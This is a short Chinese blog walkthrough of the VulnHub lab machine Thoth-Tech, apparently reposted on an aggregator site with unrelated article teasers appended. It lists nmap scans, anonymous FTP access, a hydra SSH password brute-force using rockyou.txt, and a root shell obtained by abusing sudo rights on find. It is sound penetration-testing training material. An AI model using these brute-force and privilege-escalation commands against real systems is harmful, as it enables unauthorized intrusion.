程序员经验分享-hwhale

vulnhub靶机Thoth-Tech

2023-10-27

下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova

主机发现

arp-scan -l

目标:192.168.21.148

端口扫描

nmap --min-rate 10000 -p- 192.168.21.148

服务扫描

nmap -sV -sT -O -p21,22,80 192.168.21.148

漏洞扫描

nmap --script=vuln -p21,22,80 192.168.21.148

先去看web网站

在f12里面发现

再去看看web的别的

感觉少了点东西于是又扫了一遍

nmap -A 192.168.21.148

发现ftp能匿名登入

去看看(用户名anonymous

ftp 192.168.21.148

这里告诉我们pwnlab能爆破

hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148

ssh登入

ssh pwnlab@192.168.21.148

第一个flag

信息收集

10和11是我执行的发现有find

这里用find找可执行的文件

find / -user root -perm /40000 2>/dev/null

没有东西

再看看sudo

find没有密码要求,那么就需要利用这个来提权了

find 命令提权 - 编程猎人 (programminghunter.com)

sudo find . -exec /bin/sh \; -quit

结束

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

vulnhub

安全

网络

网络安全

系统安全

vulnhub靶机Thoth-Tech 的相关文章

随机推荐

  • 浏览器的选择建议,按照这些建议选,总能找到合适的

    浏览器可以说是电脑的标配了 几乎每台电脑都安装有浏览器 最近 很多朋友询问哪些浏览器比较好用啊 今天给大家分享一下浏览器的选择建议 让大家都能选到适合自己的浏览器 同时 系统全面的介绍各家浏览器的特点 哪些值得我们花时间试用 浏览器的选择建

  • 如何在C语言中将文字显示为花里胡哨的多种颜色

    Hello大家好 最近刚刚做完C语言的课程设计 在评分标准中有一项是展示界面美观整洁 学前端的我对花里胡哨的界面情有独钟 这里为大家简单介绍三种改变字体颜色的方法 注意 本文中所有演示截图均来自VS 2022 目录 改变C语言显示界面字体颜

  • Base64转二进制文件流以及转File、图片转Base64、二进制流转Base64

    1 Base64转二进制文件流 方法一 Base64字符串转二进制流 param String dataurl Base64字符串 字符串包含Data URI scheme 例如 data image png base64 function

  • 智能硬件开发如何选择低功耗MCU?

    本文转载至 http www iot online com IC embedded 2015 090928393 html 本文将市场上典型的低功耗MCU系列进行了比较 分析得出基于ARM Cortex M0 内核的MCU系列最适合穿戴式医

  • 【GAOPS006】CRC8串行计算原理和verilog实现

    1 定义 X P N R X 被除数 P 除数 p 1 表示p bit位宽 N 商 不关心 R 余数 CRC值 2 规则 很简单就一个 1 补零 CRC8 算出来的校验和有8bit CRC16算出来的校验和有16bit 在需要计算的数据X被

  • 十、Mybatis的choose (when, otherwise)标签使用

    choose标签的作用 按顺序判断其内部when标签中的test条件出否成立 如果有一个成立 则 choose 结束 当 choose 中所有 when 的条件都不满则时 则执行 otherwise 中的sql 类似于Java 的 swit

  • 编写Java程序,建立一个人类(Person)和学生类(Student)

    编写Java程序 建立一个人类 Person 和学生类 Student 要求如下 Person中包含4个私有的数据成员name addr sex age 分别为字符串型 字符串型 字符型 整形 表示姓名 地址 性别和年龄 用一个4参构造方法

  • vue导入图标的3种方式【阿里图标】

    第一种方式 Font class css 点击 Font class 下载至本地 解压之后导入到项目 src assets icon 这个是 iconfont css 文件 font face font family iconfont Pr

  • Java面向对象之函数式编程

    1 函数式编程 在数学中 函数就是有输入量 输出量的一套计算方案 也就是 用什么东西做什么事情 相对而言 面向对象过分强调 必须通过对象的形式来做事情 而函数式思想则尽量忽略面向对象的复杂语法 强调做什么 而不是以什么形式来做 1 1 做什

  • MongoDB 数据库操作汇总

    本篇主要用于汇总MongoDB专栏 提供快速访问链接 一 安装与基本介绍 MongoDB安装与使用 MongoDB 中的基本概念 MongoDB 数据库操作 MongoDB 集合操作 二 CRUD操作 MongoDB 插入文档 插入一个 批

  • 【论文阅读】Mixed Precision Training

    GiantPandaCV导语 混合精度是一个非常简单并且实用的技术 由百度和谷歌联合发表于ICLR2018 可以让模型以半精度的方式训练模型 既能够降低显存占用 又可以保持精度 这篇文章不是最先提出使用更低精度来进行训练 但是其影响力比较深

  • 该文件没有与之关联的应用程序来执行该操作。请安装应用,请在"默认应用设置"页面中创建关联

    最近在win10新安装的一个应用程序 在程序中打开指定文件时报了 该文件没有与之关联的应用程序来执行该操作 请安装应用 请在默认应用设置 页面中创建关联 原因是该文件没有默认的打开程序 如果是txt或xml这些文件 可以右击这个文件 设置其

  • vscode缩进和Eslint缩进问题解决

    vscode缩进和Eslint缩进问题解决 vscode更改换行时的缩进 如果更改失效 取消该属性勾选 Eslint 缩进校验修改

  • 解决问题记录2:项目内使用lombok的@Log4j2失效

    问题描述 在使用Log4j2注解后 程序中使用log 启动加载时报错 找不到相对的依赖 检查lombok的依赖是正确的添加的 问题解决 尝试了网上的众多方法都没有解决 后想到是否是有其他的jar内做了lombok的依赖 导致依赖到了其他ja

  • JSP使用最简单的echarts图入门

    jsp使用最简单的echarts图表 jsp项目中应用最简单的一个折线图 柱状图等 一 echarts官网使用 首先打开echarts的api官方文档 官网 https echarts apache org examples zh inde

  • 算法的复杂度

    常用的算法的时间复杂度和空间复杂度 排序法 最差时间分析 平均时间复杂度 稳定度 空间复杂度 冒泡排序 O n2 O n2 稳定 O 1 快速排序 O n2 O n log2n 不稳定 O log2n O n 选择排序 O n2 O n2

  • 我在知乎学写作

    最懂技术的传播者 最懂传播的工程师 最近被知乎成功 忽悠 报名了一个 写作新人培养计划 的课程 写作新人 这老黄瓜未免也太能给自己刷绿漆了吧 心里头想着 还是得push自己 在内容创作的道路上 搞点事情啊 咋回事呢 为什么是知乎 从媒体江湖

  • Ubuntu20.04 ROS noetic安装教程

    注意 本贴是ros官网的方法 使用ros原版官方源 不是国内镜像 适合网络环境比较好的小伙伴 添加源 sudo sh c echo deb http packages ros org ros ubuntu lsb release sc ma

  • NUC980开源项目6-获取官方源码

    上面是我的微信和QQ群 欢迎新朋友的加入 项目码云地址 国内下载速度快 https gitee com jun626 nuc980 open source project 项目github地址 https github com Jun117

  • vulnhub靶机Thoth-Tech

    下载地址 https download vulnhub com thothtech Thoth Tech ova 主机发现 arp scan l 目标 192 168 21 148 端口扫描 nmap min rate 10000 p 19

热门标签